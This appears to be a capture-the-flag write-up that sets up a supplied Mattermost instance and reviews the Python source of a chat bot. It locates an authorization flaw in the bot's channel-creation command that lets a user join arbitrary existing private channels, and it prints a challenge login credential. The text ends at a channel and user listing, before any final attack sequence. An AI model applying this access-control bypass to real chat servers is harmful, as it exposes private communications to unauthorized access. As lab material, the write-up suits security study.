Logo
Task 6 Writeup
Overview
Task 6 Writeup

Task 6 Writeup

January 6, 2026
20 min read

Task 6 - Crossing the Channel - (Vulnerability Research)

Description

This high visibility investigation has garnered a lot of agency attention. Due to your success, your team has designated you as the lead for the tasks ahead. Partnering with CNO and CYBERCOM mission elements, you work with operations to collect the persistent data associated with the identified Mattermost instance. Our analysts inform us that it was obtained through a one-time opportunity and we must move quickly as this may hold the key to tracking down our adversary! We have managed to create an account but it only granted us access to one channel. The adversary doesn’t appear to be in that channel.

We will have to figure out how to get into the same channel as the adversary. If we can gain access to their communications, we may uncover further opportunity.

You are tasked with gaining access to the same channel as the target. The only interface that you have is the chat interface in Mattermost!

Downloads:

  • Mattermost instance (volumes.tar.gz)
  • User login (user.txt)

Prompt:

  • Submit a series of commands, one per line, given to the Mattermost server which will allow you to gain access to a channel with the adversary.

This time, we’re given a Mattermost instance, as volumes.tar.gz contains a db folder with the standard Mattermost PostgreSQL database files, and a bot folder that contains a sample Mattermost bot implementation in Python.

We also have a user login in user.txt:

user.txt
cautiousferret5:NCfYJKXkdyrIterw

Before we look at the bot, let’s set up the Mattermost instance locally so that we can log in with the provided user and explore the application.

Mattermost setup

We don’t need to get too complicated, so let’s just set it up locally on our machine using Docker, following the Mattermost official Docker instructions.

First we clone the provided Docker repository and set up the environment file, using localhost as the domain since we’re running it locally. We also need to downgrade the PostgreSQL version, since db/var/lib/postgresql/data/PG_VERSION contains 13:

Terminal window
git clone https://github.com/mattermost/docker
cd docker
cp env.example .env
sed -i 's/DOMAIN=.*/DOMAIN=localhost/' .env
sed -i 's/POSTGRES_IMAGE_TAG=.*/POSTGRES_IMAGE_TAG=13-alpine/' .env
Warning

The default PostgreSQL version in the Mattermost Docker repository at the time of writing is 18-alpine, which removed the /data suffix from the Docker volume path. Since we need to downgrade to PostgreSQL 13, we also need to adjust the volume path accordingly in docker-compose.yml. Open it up and change:

docker-compose.yml
volumes:
- ${POSTGRES_DATA_PATH}:/var/lib/postgresql
- ${POSTGRES_DATA_PATH}:/var/lib/postgresql/data

Next we copy the volumes folder we extracted into the docker folder, then create the rest of the necessary folders, and set the correct permissions:

Terminal window
cp -r ../volumes .
sudo chmod -R 777 ./volumes/db
mkdir -p ./volumes/app/mattermost/{config,data,logs,plugins,client/plugins,bleve-indexes}
sudo chown -R 2000:2000 ./volumes/app/mattermost

We can skip all the certificate and nginx steps since we’re running locally, and simply deploy with Docker Compose:

Terminal window
docker compose -f docker-compose.yml -f docker-compose.without-nginx.yml up -d

And now we can log in with our provided creds and explore the Mattermost instance! Mattermost login screen

Using our cautiousferret5 account, we can see that we only have access to a public channel on a team called Malware Central: Mattermost public channel

The bot

Now that we have the Mattermost instance running, let’s look at the bot code in the bot folder. The bot is implemented in Python and uses the mmpy_bot library to interact with the Mattermost API. There are 7 files total:

  • bot.py: The main bot loader.
  • malware_database.py: An in-memory database for storing some malware and sale information.
  • mmpy_bot_monkeypatch.py: A monkeypatch for the mmpy_bot library to add an option to plugin commands.
  • plugin_admin.py: A plugin for admin util commands.
  • plugin_managechannel.py: A plugin for managing channel posts.
  • plugin_onboarding.py: A plugin for onboarding new users, mostly just sends a configurable announcement.
  • plugin_sales.py: A plugin for handling sales of malware.

You can expand these to look at each one, but I’ll go over the relevant parts later.

bot/bot.py
37 collapsed lines
#!/usr/bin/env python
import sys
from loguru import logger
# Set log level based on -v argument
if "-v" in sys.argv:
logger.remove()
logger.add(sys.stderr, level="DEBUG")
else:
logger.remove()
logger.add(sys.stderr, level="INFO")
import mmpy_bot_monkeypatch # Ensure monkeypatch is applied before any plugin imports
from mmpy_bot import Bot, Settings
from mmpy_bot.plugins import HelpPlugin
from plugin_sales import SalesPlugin
from plugin_onboarding import OnboardingPlugin
from plugin_admin import AdminPlugin
from plugin_managechannel import ManageChannelPlugin
import os
from dotenv import load_dotenv
# Load environment variables from .env file
load_dotenv(os.path.join(os.path.dirname(__file__), '.env'))
bot = Bot(
settings=Settings(
MATTERMOST_URL = os.environ.get("MATTERMOST_URL", "http://127.0.0.1"),
MATTERMOST_PORT = int(os.environ.get("MATTERMOST_PORT", 8065)),
BOT_TOKEN = os.environ.get("BOT_TOKEN"),
BOT_TEAM = os.environ.get("BOT_TEAM", "test_team"),
SSL_VERIFY = os.environ.get("SSL_VERIFY", "False") == "True",
RESPOND_CHANNEL_HELP=True,
),
plugins=[SalesPlugin(), HelpPlugin(), OnboardingPlugin(),ManageChannelPlugin(),AdminPlugin()],
)
bot.run()
bot/malware_database.py
71 collapsed lines
import os
import pickle
import threading
from loguru import logger
from functools import wraps
DB_FILE = os.path.join(os.path.dirname(__file__), 'malware_db.pkl')
# Decorator to lock all public methods
def locked_methods(cls):
for attr_name, attr in cls.__dict__.items():
if callable(attr) and not attr_name.startswith('_'):
@wraps(attr)
def locked(self, *args, __attr=attr, **kwargs):
with self._lock:
return __attr(self, *args, **kwargs)
setattr(cls, attr_name, locked)
return cls
@locked_methods
class MalwareDatabase:
def __init__(self, db_file=DB_FILE):
self.db_file = db_file
self._lock = threading.Lock()
def _load_db(self):
if not os.path.exists(self.db_file):
return {'offerings': [], 'sales': []}
with open(self.db_file, 'rb') as f:
return pickle.load(f)
def _save_db(self, db):
with open(self.db_file, 'wb') as f:
pickle.dump(db, f)
def add_offering(self, offering):
db = self._load_db()
offering['id'] = len(db['offerings']) + 1
logger.debug(f"Adding offering: {offering}")
db['offerings'].append(offering)
self._save_db(db)
logger.info(f"Offering added with ID {offering['id']}")
return offering['id']
def get_offerings(self):
db = self._load_db()
logger.debug(f"Getting offerings: {db['offerings']}")
return db['offerings']
def record_sale(self, sale):
db = self._load_db()
logger.debug(f"Recording sale: {sale}")
db['sales'].append(sale)
self._save_db(db)
logger.info(f"Sale recorded: {sale}")
def get_sales(self):
db = self._load_db()
logger.debug(f"Getting sales: {db['sales']}")
return db['sales']
# Singleton instance for use throughout the bot
db = MalwareDatabase()
# Usage in your plugin:
# from malware_database import db
# db.add_offering(...)
# db.get_offerings()
# db.record_sale(...)
# db.get_sales()
bot/mmpy_bot_monkeypatch.py
53 collapsed lines
# mmpy_bot_monkeypatch.py
"""
Monkey patch mmpy_bot MessageFunction to support no_direct option.
"""
from mmpy_bot.function import MessageFunction
from mmpy_bot.utils import completed_future
import fnmatch
from loguru import logger
# Save original methods
_original_init = MessageFunction.__init__
_original_call = MessageFunction.__call__
def patched_init(self, *args, allowed_users_glob=None, **kwargs):
logger.debug(f"patched_init called for {getattr(self, 'name', None)} with allowed_users_glob={allowed_users_glob} and no_direct={kwargs.get('no_direct', False)}")
_original_init(self, *args, **kwargs)
self.no_direct = kwargs.get('no_direct', False)
# allowed_users_glob setup
if allowed_users_glob is not None:
logger.debug(f"Setting allowed_users_glob: {allowed_users_glob}")
self.allowed_users_glob = [pattern.lower() for pattern in allowed_users_glob]
elif hasattr(self, 'allowed_users_glob'):
logger.debug("allowed_users_glob already set")
pass # already set
else:
self.allowed_users_glob = []
logger.debug("allowed_users_glob set to empty list")
def patched_call(self, message, *args):
logger.debug(f"patched_call for {getattr(self, 'name', None)} from sender={message.sender_name}")
# If no_direct is set and this is a direct message, skip
if getattr(self, 'no_direct', False) and message.is_direct_message:
logger.debug("no_direct is set and message is direct, skipping handler")
return None if not self.is_coroutine else completed_future()
# Combined exact and glob matching for allowed_users
sender = message.sender_name.lower()
allowed_exact = sender in getattr(self, 'allowed_users', [])
allowed_glob = any(fnmatch.fnmatch(sender, pattern) for pattern in getattr(self, 'allowed_users_glob', []))
logger.debug(f"allowed_exact={allowed_exact}, allowed_glob={allowed_glob}, allowed_users={getattr(self, 'allowed_users', [])}, allowed_users_glob={getattr(self, 'allowed_users_glob', [])}")
if getattr(self, 'allowed_users', None) or getattr(self, 'allowed_users_glob', None):
if not (allowed_exact or allowed_glob):
logger.debug(f"Permission denied for sender={sender}")
if not getattr(self, 'silence_fail_msg', False):
self.plugin.driver.reply_to(
message, "You do not have permission to perform this action!"
)
return None if not self.is_coroutine else completed_future()
else:
logger.debug(f"Permission granted for sender={sender}")
return _original_call(self, message, *args)
MessageFunction.__init__ = patched_init
MessageFunction.__call__ = patched_call
bot/plugin_admin.py
29 collapsed lines
from mmpy_bot import Plugin
from mmpy_bot.scheduler import schedule
from loguru import logger
from malware_database import db
from mmpy_bot.function import listen_to
import subprocess
class AdminPlugin(Plugin):
"""
A plugin to handle administration utilities
"""
@listen_to("^!util df", allowed_users_glob=["mod_*","admin_*"])
def df_cmd(self, message ):
logger.info(f"AdminPlugin: running df")
result = subprocess.run(["df", "-h", "-x", "tmpfs"],capture_output=True, text=True)
self.driver.reply_to(message, f"{result.stdout}")
@listen_to("^!util uptime$", allowed_users_glob=["mod_*","admin_*"])
def uptime_cmd(self, message):
logger.info("AdminPlugin: running uptime")
result = subprocess.run(["uptime"], capture_output=True, text=True)
self.driver.reply_to(message, f"{result.stdout}")
@listen_to("^!util free$", allowed_users_glob=["mod_*","admin_*"])
def free_cmd(self, message):
logger.info("AdminPlugin: running free -h")
result = subprocess.run(["free", "-h"], capture_output=True, text=True)
self.driver.reply_to(message, f"{result.stdout}")
bot/plugin_managechannel.py
46 collapsed lines
from mmpy_bot_monkeypatch import * # Ensure monkeypatch is applied before anything else
from mmpy_bot import Plugin, Message, listen_to
from malware_database import db
from loguru import logger
def get_pinned(driver, message: Message, *args):
logger.debug(f"handle_get_pinned called with message: {message.text}")
team_name = driver.options.get('team', 'malwarecentral')
print(f"[DEBUG] Looking up team: {team_name}")
# Get team info
team = driver.teams.get_team_by_name(team_name)
channel_id = message.channel_id
posts = driver.channels.get_pinned_posts(channel_id)
logger.info(f"found pinned posts {posts}")
order= posts["order"]
all_pinned ={}
for post in order:
all_pinned[post] = posts["posts"][post]["message"]
logger.info(f"respons is {all_pinned}")
return all_pinned
class ManageChannelPlugin(Plugin):
"""
A plugin to handle Managing Channel Posts
"""
@listen_to('^!delete nonpinned', no_direct=True,human_description="!delete nonpinned\n\tget rid of any posts that aren't pinned")
def handle_delete_nonpinned(self : Plugin, message: Message, *args):
all_pinned = get_pinned(self.driver, message)
channel_id = message.channel_id
posts = self.driver.posts.get_posts_for_channel(channel_id)["order"]
logger.info(f"got {len(posts)} posts for this channel")
logger.info(posts)
logger.info(all_pinned)
#loop through every post and delete the ones that aren't pinned
count = 0
while (len(posts) > len(all_pinned.items())):
for post in posts:
if post not in all_pinned:
self.driver.posts.delete_post(post)
count += 1
posts = self.driver.posts.get_posts_for_channel(channel_id)["order"]
logger.info(f"got {len(posts)} posts for this channel")
bot/plugin_onboarding.py
49 collapsed lines
from mmpy_bot import Plugin
from mmpy_bot.scheduler import schedule
from loguru import logger
from malware_database import db
from mmpy_bot.function import listen_to
ANNOUNCEMENT_CHANNEL = "public"
ANNOUNCEMENT_RULES = """
Welcome to the Malware Marketplace! Please read the rules and stay safe.
1. Do not discuss illegal activities
2. Do not wreak havoc
3. Do not make $$$$
4. Don't even consider HACK(ing) THE PLANET
5. Always buck authority
Current info and updates will appear here.
"""
ANNOUNCEMENT_MIDDLE = "No current announcements"
class OnboardingPlugin(Plugin):
"""Plugin to send onboarding/welcome/rules announcements."""
def on_start(self):
self.announcement_middle = ANNOUNCEMENT_MIDDLE
logger.info(f"PluginOnboarding: Sending initial announcement to {ANNOUNCEMENT_CHANNEL}")
self.send_announcement()
schedule.every(1).hours.do(self.send_announcement)
@listen_to("^!update_announcement (.+)$", allowed_users_glob=["mod_*"])
def update_announcement_cmd(self, message, new_middle):
logger.info(f"PluginOnboarding: Announcement middle updated by {message.sender_name}")
self.announcement_middle = new_middle
self.send_announcement()
self.driver.reply_to(message, "Announcement updated and sent.")
def send_announcement(self):
# Get team name from driver options
team_name = self.settings.BOT_TEAM
# Get channel info by name and team name (works for public/private)
channel = self.driver.channels.get_channel_by_name_for_team_name(team_name, ANNOUNCEMENT_CHANNEL)
channel_id = channel.get('id') if isinstance(channel, dict) else channel.json().get('id')
# Get current offerings
offerings = db.get_offerings()
offerings_text = "Current Offerings:\n" + "\n".join([
f"ID: {o['id']}, Name: {o['name']}, Type: {o['type']}, OS: {o['os']}, Price: {o['price']}" for o in offerings
]) if offerings else "No current offerings."
announcement = f"{ANNOUNCEMENT_RULES}\n\n{self.announcement_middle}\n\n{offerings_text}"
logger.debug(f"PluginOnboarding: Sending announcement to channel_id={channel_id}")
self.driver.create_post(channel_id=channel_id, message=announcement)
bot/plugin_sales.py
212 collapsed lines
from mmpy_bot_monkeypatch import * # Ensure monkeypatch is applied before anything else
from mmpy_bot import Plugin, Message, listen_to
from malware_database import db
from loguru import logger
MALWARE_TYPES = ["0click", "1click", "LPE", "SBE", "RCE", "Phishing", "ExploitKit", "Backdoor", "Rootkit"]
OS_TYPES = ["Windows", "Linux", "macOS", "Android", "iOS", "Unix"]
ODAYS = ["0day", "nday"]
class SalesPlugin(Plugin):
"""
A plugin to handle sales in Mattermost.
"""
@listen_to('^!nego (.*)$', no_direct=True,human_description="!nego channel seller moderator1 moderator2\n\tCreate a negotiation channel to close a deal!")
def handle_nego(self : Plugin, message: Message, *args):
logger.debug(f"handle_nego called with message: {message.text}")
args = message.text.strip().split()
if len(args) != 5:
self.driver.reply_to(message, "Usage: !nego channel seller moderator1 moderator2")
logger.warning("handle_nego: Incorrect number of arguments")
return
user1 = message.sender_name
_, channel_name, user2, user3, user4 = args[:6]
if not user4.startswith('mod_'):
self.driver.reply_to(message, f"You must have a mod")
return
display_name = channel_name
team_name = self.driver.options.get('team', 'malwarecentral')
print(f"[DEBUG] Looking up team: {team_name}")
# Get team info
team = self.driver.teams.get_team_by_name(team_name)
logger.debug(f"Team API response: {team}")
team_id = team.get('id') if isinstance(team, dict) else team.json().get('id')
print(f"[DEBUG] team_id: {team_id}")
# Create channel
channel_options = {
"team_id": team_id,
"name": channel_name,
"display_name": display_name,
"type": "P"
}
logger.debug(f"Creating channel with options: {channel_options}")
try:
channel = self.driver.channels.create_channel(channel_options)
print(f"[DEBUG] Channel API response: {channel}")
#hide weird exception when we have an archived channel with the same name, we'll just unarchive it
except Exception as e:
print(f"[DEBUG] Exception while creating channel: {e}")
# Try to unarchive the channel if it exists
try:
archived_channel = self.driver.channels.get_channel_by_name(channel_name, team_id)
if archived_channel and archived_channel.get('delete_at') > 0:
logger.info(f"Unarchiving existing channel: {archived_channel}")
self.driver.channels.unarchive_channel(archived_channel.get('id'))
channel = archived_channel
except Exception as e:
self.driver.reply_to(message, f"Failed to create or unarchive channel: {e}")
#we either created a new channel or unarchived an existing one
print(f"[DEBUG] getting channel: {channel_name} in team {team_id}")
channel = self.driver.channels.get_channel_by_name(team_id, channel_name)
channel_id = channel.get('id') if isinstance(channel, dict) else channel.json().get('id')
print(f"[DEBUG] channel_id: {channel_id}")
# Get user ids
user_ids = []
for uname in [user1, user2, user3, user4]:
logger.debug(f"Looking up user: {uname}")
user = self.driver.users.get_user_by_username(uname)
logger.debug(f"User API response: {user}")
uid = user.get('id') if isinstance(user, dict) else user.json().get('id')
logger.debug(f"user_id for {uname}: {uid}")
if not uid:
self.driver.reply_to(message, f"User not found: {uname}")
logger.warning(f"handle_nego: User not found: {uname}")
return
user_ids.append(uid)
if len(set(user_ids)) != 4:
logger.warning(f"incorrect number of users to run command")
self.driver.reply_to(message, f"incorrect number of users to run command")
return
print(f"[DEBUG] All user_ids: {user_ids}")
# Check if channel already has members
existing_members = self.driver.channels.get_channel_members(channel_id)
existing_member_user_ids = [member.get('user_id') for member in existing_members]
existing_user_ids = any(uid in user_ids for uid in existing_member_user_ids)
if existing_user_ids:
# If the channel already has members, we should not add them again
# This is a safeguard against creating duplicate entries in an archived channel
print(f"[DEBUG] Existing members in channel {channel_id}: {existing_member_user_ids}, this shouldn't happen! archived channels should be empty")
return
# make sure not adding randos
current_members_ids = [m['user_id'] for m in self.driver.channels.get_channel_members(message.channel_id)]
if not (user_ids[0] in current_members_ids and user_ids[1] in current_members_ids and
user_ids[2] in current_members_ids and user_ids[3] in current_members_ids):
self.driver.reply_to(message, f"Could not find users")
return
# Add users to channel
for uid in user_ids:
logger.debug(f"Adding user {uid} to channel {channel_id}")
self.driver.channels.add_channel_member(channel_id, {"user_id": uid})
self.driver.reply_to(message, f"Created channel '{display_name}' and added users: {user1}, {user2}, {user3}")
logger.info(f"Created channel '{display_name}' and added users: {user1}, {user2}, {user3}")
@listen_to('^!add_offering (.*)$', no_direct=True,allowed_users_glob=["mod_*"], human_description="!add_offering name type os oday_or_nday creator price\n\tAdd a new malware offering.")
def add_offering_cmd(self, message: Message, *args):
args = message.text.strip().split()
logger.debug(f"add_offering_cmd called with args: {args}")
if len(args) != 7:
self.driver.reply_to(message, "Usage: !add_offering name type os oday_or_nday creator price")
logger.warning("add_offering: Incorrect number of arguments")
return
_, name, mtype, osys, oday_nday, creator, price = args
mtype_lc = mtype.lower()
osys_lc = osys.lower()
oday_nday_lc = oday_nday.lower()
logger.debug(f"Normalized values: type={mtype_lc}, os={osys_lc}, oday_nday={oday_nday_lc}")
if mtype_lc not in [t.lower() for t in MALWARE_TYPES]:
self.driver.reply_to(message, f"Invalid malware type. Allowed: {', '.join(MALWARE_TYPES)}")
logger.warning(f"add_offering: Invalid malware type '{mtype}'")
return
if osys_lc not in [o.lower() for o in OS_TYPES]:
self.driver.reply_to(message, f"Invalid OS. Allowed: {', '.join(OS_TYPES)}")
logger.warning(f"add_offering: Invalid OS '{osys}'")
return
if oday_nday_lc not in [d.lower() for d in ODAYS]:
self.driver.reply_to(message, "oday_or_nday must be '0day' or 'nday'.")
logger.warning(f"add_offering: Invalid oday_or_nday '{oday_nday}'")
return
team_name = self.driver.options.get('team', 'malwarecentral')
team = self.driver.teams.get_team_by_name(team_name)
team_id = team.get('id') if isinstance(team, dict) else team.json().get('id')
user = self.driver.users.get_user_by_username(creator)
if not user or (user.get('id') if isinstance(user, dict) else user.json().get('id')) is None:
self.driver.reply_to(message, f"Creator '{creator}' is not a valid user in the team.")
logger.warning(f"add_offering: Creator '{creator}' is not a valid user in the team.")
return
try:
price_val = float(price)
if price_val < 0:
raise ValueError
except ValueError:
self.driver.reply_to(message, "Price must be a positive number.")
logger.warning(f"add_offering: Invalid price '{price}'")
return
offering = {
'name': name,
'type': mtype_lc,
'os': osys_lc,
'oday_or_nday': oday_nday_lc,
'creator': creator,
'price': price_val
}
logger.info(f"Adding offering: {offering}")
oid = db.add_offering(offering)
self.driver.reply_to(message, f"Offering added with ID {oid}.")
logger.info(f"Offering added with ID {oid}")
@listen_to('^!get_offerings (.*)$', no_direct=True, human_description="!get_offerings\n\tList all malware offerings.")
def get_offerings_cmd(self, message: Message, *args):
logger.debug(f"get_offerings_cmd called with message: {message.text}")
offerings = db.get_offerings()
logger.debug(f"Offerings retrieved: {offerings}")
if not offerings:
self.driver.reply_to(message, "No offerings available.")
logger.info("get_offerings_cmd: No offerings available.")
return
msg = "Malware Offerings:\n" + "\n".join([
f"ID: {o['id']}, Name: {o['name']}, Type: {o['type']}, OS: {o['os']}, Oday/Nday: {o['oday_or_nday']}, Creator: {o['creator']}, Price: {o['price']}"
for o in offerings
])
self.driver.reply_to(message, msg)
logger.info("get_offerings_cmd: Sent offerings list.")
#TODO update these users to be other admins we expect to be listed within the team
@listen_to('^!record_sale (.*)$', no_direct=True, allowed_users_glob=["mod_*"],human_description="!record_sale buyer price offering_id\n\tRecord a sale of malware.",allowed_users=["badguy","otherbadguy","some guys","user1"])
def record_sale_cmd(self, message: Message, *args):
logger.debug(f"record_sale_cmd called with message: {message.text}")
args = message.text.strip().split()
if len(args) != 4:
self.driver.reply_to(message, "Usage: !record_sale buyer price offering_id")
logger.warning("record_sale_cmd: Incorrect number of arguments")
return
_, buyer, price, offering_id = args
# Validate buyer is a user in the team
team_name = self.driver.options.get('team', 'malwarecentral')
team = self.driver.teams.get_team_by_name(team_name)
team_id = team.get('id') if isinstance(team, dict) else team.json().get('id')
user = self.driver.users.get_user_by_username(buyer)
if not user or (user.get('id') if isinstance(user, dict) else user.json().get('id')) is None:
self.driver.reply_to(message, f"Buyer '{buyer}' is not a valid user in the team.")
logger.warning(f"record_sale_cmd: Buyer '{buyer}' is not a valid user in the team.")
return
# Seller is the creator of the offering
offerings = db.get_offerings()
offering = next((o for o in offerings if str(o['id']) == offering_id), None)
if not offering:
self.driver.reply_to(message, f"Offering ID {offering_id} not found.")
logger.warning(f"record_sale_cmd: Offering ID {offering_id} not found.")
return
seller = offering['creator']
sale = {
'buyer': buyer,
'seller': seller,
'price': price,
'offering_id': offering_id
}
logger.info(f"Recording sale: {sale}")
db.record_sale(sale)
self.driver.reply_to(message, f"Sale recorded for offering ID {offering_id}.")
logger.info(f"Sale recorded for offering ID {offering_id}")

The way mmpy_bot works is that it listens for messages in channels and direct messages, and when a message matches a registered command pattern, it calls the corresponding handler function in the plugin.

bot/plugin_admin.py
@listen_to("^!util uptime$", allowed_users_glob=["mod_*","admin_*"])
def uptime_cmd(self, message):
logger.info("AdminPlugin: running uptime")
result = subprocess.run(["uptime"], capture_output=True, text=True)
self.driver.reply_to(message, f"{result.stdout}")

For example, this command listens for messages that match the regex ^!util uptime$ and are sent by users whose usernames match the glob patterns mod_* or admin_*. When such a message is received, it runs the uptime_cmd function, which executes the uptime command on the server and replies with the output.

Some of the commands also have a no_direct=True option, which means they will not respond to direct messages. This is implemented in the monkeypatch in mmpy_bot_monkeypatch.py.

bot/mmpy_bot_monkeypatch.py
28 collapsed lines
# mmpy_bot_monkeypatch.py
"""
Monkey patch mmpy_bot MessageFunction to support no_direct option.
"""
from mmpy_bot.function import MessageFunction
from mmpy_bot.utils import completed_future
import fnmatch
from loguru import logger
# Save original methods
_original_init = MessageFunction.__init__
_original_call = MessageFunction.__call__
def patched_init(self, *args, allowed_users_glob=None, **kwargs):
logger.debug(f"patched_init called for {getattr(self, 'name', None)} with allowed_users_glob={allowed_users_glob} and no_direct={kwargs.get('no_direct', False)}")
_original_init(self, *args, **kwargs)
self.no_direct = kwargs.get('no_direct', False)
# allowed_users_glob setup
if allowed_users_glob is not None:
logger.debug(f"Setting allowed_users_glob: {allowed_users_glob}")
self.allowed_users_glob = [pattern.lower() for pattern in allowed_users_glob]
elif hasattr(self, 'allowed_users_glob'):
logger.debug("allowed_users_glob already set")
pass # already set
else:
self.allowed_users_glob = []
logger.debug("allowed_users_glob set to empty list")
def patched_call(self, message, *args):
logger.debug(f"patched_call for {getattr(self, 'name', None)} from sender={message.sender_name}")
# If no_direct is set and this is a direct message, skip
if getattr(self, 'no_direct', False) and message.is_direct_message:
logger.debug("no_direct is set and message is direct, skipping handler")
return None if not self.is_coroutine else completed_future()
19 collapsed lines
# Combined exact and glob matching for allowed_users
sender = message.sender_name.lower()
allowed_exact = sender in getattr(self, 'allowed_users', [])
allowed_glob = any(fnmatch.fnmatch(sender, pattern) for pattern in getattr(self, 'allowed_users_glob', []))
logger.debug(f"allowed_exact={allowed_exact}, allowed_glob={allowed_glob}, allowed_users={getattr(self, 'allowed_users', [])}, allowed_users_glob={getattr(self, 'allowed_users_glob', [])}")
if getattr(self, 'allowed_users', None) or getattr(self, 'allowed_users_glob', None):
if not (allowed_exact or allowed_glob):
logger.debug(f"Permission denied for sender={sender}")
if not getattr(self, 'silence_fail_msg', False):
self.plugin.driver.reply_to(
message, "You do not have permission to perform this action!"
)
return None if not self.is_coroutine else completed_future()
else:
logger.debug(f"Permission granted for sender={sender}")
return _original_call(self, message, *args)
MessageFunction.__init__ = patched_init
MessageFunction.__call__ = patched_call

Unfortunately for us, most of the commands have some restrictions that prevent our user, cautiousferret5, from using them. Here’s a list of every command, and if we can use it or not:

all plugin commands
# plugin_admin.py
@listen_to("^!util df", allowed_users_glob=["mod_*","admin_*"])
@listen_to("^!util uptime$", allowed_users_glob=["mod_*","admin_*"])
@listen_to("^!util free$", allowed_users_glob=["mod_*","admin_*"])
# plugin_managechannel.py
@listen_to('^!delete nonpinned', no_direct=True,human_description="!delete nonpinned\n\tget rid of any posts that aren't pinned")
# plugin_onboarding.py
@listen_to("^!update_announcement (.+)$", allowed_users_glob=["mod_*"])
# plugin_sales.py
@listen_to('^!nego (.*)$', no_direct=True,human_description="!nego channel seller moderator1 moderator2\n\tCreate a negotiation channel to close a deal!")
@listen_to('^!add_offering (.*)$', no_direct=True,allowed_users_glob=["mod_*"], human_description="!add_offering name type os oday_or_nday creator price\n\tAdd a new malware offering.")
@listen_to('^!get_offerings (.*)$', no_direct=True, human_description="!get_offerings\n\tList all malware offerings.")
@listen_to('^!record_sale (.*)$', no_direct=True, allowed_users_glob=["mod_*"],human_description="!record_sale buyer price offering_id\n\tRecord a sale of malware.",allowed_users=["badguy","otherbadguy","some guys","user1"])

From the listed commands, the only one that we can use and adds us to channels is the !nego command in plugin_sales.py. This command allows us to create a negotiation channel with a seller and two moderators.

bot/plugin_sales.py
@listen_to('^!nego (.*)$', no_direct=True,human_description="!nego channel seller moderator1 moderator2\n\tCreate a negotiation channel to close a deal!")
def handle_nego(self : Plugin, message: Message, *args):
logger.debug(f"handle_nego called with message: {message.text}")
args = message.text.strip().split()
if len(args) != 5:
3 collapsed lines
self.driver.reply_to(message, "Usage: !nego channel seller moderator1 moderator2")
logger.warning("handle_nego: Incorrect number of arguments")
return
user1 = message.sender_name
_, channel_name, user2, user3, user4 = args[:6]
if not user4.startswith('mod_'):
self.driver.reply_to(message, f"You must have a mod")
return
19 collapsed lines
display_name = channel_name
team_name = self.driver.options.get('team', 'malwarecentral')
print(f"[DEBUG] Looking up team: {team_name}")
# Get team info
team = self.driver.teams.get_team_by_name(team_name)
logger.debug(f"Team API response: {team}")
team_id = team.get('id') if isinstance(team, dict) else team.json().get('id')
print(f"[DEBUG] team_id: {team_id}")
# Create channel
channel_options = {
"team_id": team_id,
"name": channel_name,
"display_name": display_name,
"type": "P"
}
logger.debug(f"Creating channel with options: {channel_options}")
try:
channel = self.driver.channels.create_channel(channel_options)
print(f"[DEBUG] Channel API response: {channel}")
#hide weird exception when we have an archived channel with the same name, we'll just unarchive it
except Exception as e:
print(f"[DEBUG] Exception while creating channel: {e}")
# Try to unarchive the channel if it exists
try:
5 collapsed lines
archived_channel = self.driver.channels.get_channel_by_name(channel_name, team_id)
if archived_channel and archived_channel.get('delete_at') > 0:
logger.info(f"Unarchiving existing channel: {archived_channel}")
self.driver.channels.unarchive_channel(archived_channel.get('id'))
channel = archived_channel
except Exception as e:
self.driver.reply_to(message, f"Failed to create or unarchive channel: {e}")
#we either created a new channel or unarchived an existing one
4 collapsed lines
print(f"[DEBUG] getting channel: {channel_name} in team {team_id}")
channel = self.driver.channels.get_channel_by_name(team_id, channel_name)
channel_id = channel.get('id') if isinstance(channel, dict) else channel.json().get('id')
print(f"[DEBUG] channel_id: {channel_id}")
# Get user ids
user_ids = []
for uname in [user1, user2, user3, user4]:
9 collapsed lines
logger.debug(f"Looking up user: {uname}")
user = self.driver.users.get_user_by_username(uname)
logger.debug(f"User API response: {user}")
uid = user.get('id') if isinstance(user, dict) else user.json().get('id')
logger.debug(f"user_id for {uname}: {uid}")
if not uid:
self.driver.reply_to(message, f"User not found: {uname}")
logger.warning(f"handle_nego: User not found: {uname}")
return
user_ids.append(uid)
if len(set(user_ids)) != 4:
logger.warning(f"incorrect number of users to run command")
self.driver.reply_to(message, f"incorrect number of users to run command")
return
print(f"[DEBUG] All user_ids: {user_ids}")
# Check if channel already has members
existing_members = self.driver.channels.get_channel_members(channel_id)
existing_member_user_ids = [member.get('user_id') for member in existing_members]
existing_user_ids = any(uid in user_ids for uid in existing_member_user_ids)
if existing_user_ids:
# If the channel already has members, we should not add them again
# This is a safeguard against creating duplicate entries in an archived channel
print(f"[DEBUG] Existing members in channel {channel_id}: {existing_member_user_ids}, this shouldn't happen! archived channels should be empty")
return
# make sure not adding randos
current_members_ids = [m['user_id'] for m in self.driver.channels.get_channel_members(message.channel_id)]
if not (user_ids[0] in current_members_ids and user_ids[1] in current_members_ids and
user_ids[2] in current_members_ids and user_ids[3] in current_members_ids):
self.driver.reply_to(message, f"Could not find users")
return
# Add users to channel
5 collapsed lines
for uid in user_ids:
logger.debug(f"Adding user {uid} to channel {channel_id}")
self.driver.channels.add_channel_member(channel_id, {"user_id": uid})
self.driver.reply_to(message, f"Created channel '{display_name}' and added users: {user1}, {user2}, {user3}")
logger.info(f"Created channel '{display_name}' and added users: {user1}, {user2}, {user3}")

If you analyze the un-archiving functionality, you’ll realize that if there exists an active channel with the same name, it will first error when trying to create, then it will error again when trying to unarchive. However, this second error just gets caught and the command continues. This means that we can add ourselves to any active channel we know that name of, as long as we can satisfy the other requirements of the command.

Starting from top to bottom, these other requirements are:

  1. The user4 we provide must start with mod_, meaning they must be a moderator.
  2. We must provide 4 unique users, checked by user IDs.
  3. None of the users we provide can exist in the requested channel already.
  4. All 4 users must already be members of the channel where we issue the command.

That’s great, but what channel are we actually trying to access? Let’s go back and look at the Mattermost instance again.

Dumping the Mattermost channels

Using Mattermost’s builtin mmctl CLI tool, we can dump all the channels and users in the instance.

Terminal window
$ docker compose exec mattermost mmctl --local channel list malwarecentral
public
channel14210 (private)
channel15769 (private)
channel23011 (private)
channel28375 (private)
channel36984 (private)
channel37915 (private)
channel41964 (private)
channel42011 (private)
channel43502 (private)
channel45015 (private)
channel46360 (private)
channel51816 (private)
channel56398 (private)
channel60311 (private)
channel60871 (private)
channel6153 (private)
channel62240 (private)
channel62739 (private)
channel64089 (private)
channel76379 (private)
channel77848 (private)
channel78377 (private)
channel91739 (private)
There are 24 channels on local instance
Terminal window
$ docker compose exec mattermost mmctl --local user list
sqeoydebhtdpxreb36ddc1ztxr: admin_zestysnail91 (admin_zestysnail91@malware.xyz)
nccuidn66fngdy3psuoearaacw: alertfish82 (alertfish82@malware.xyz)
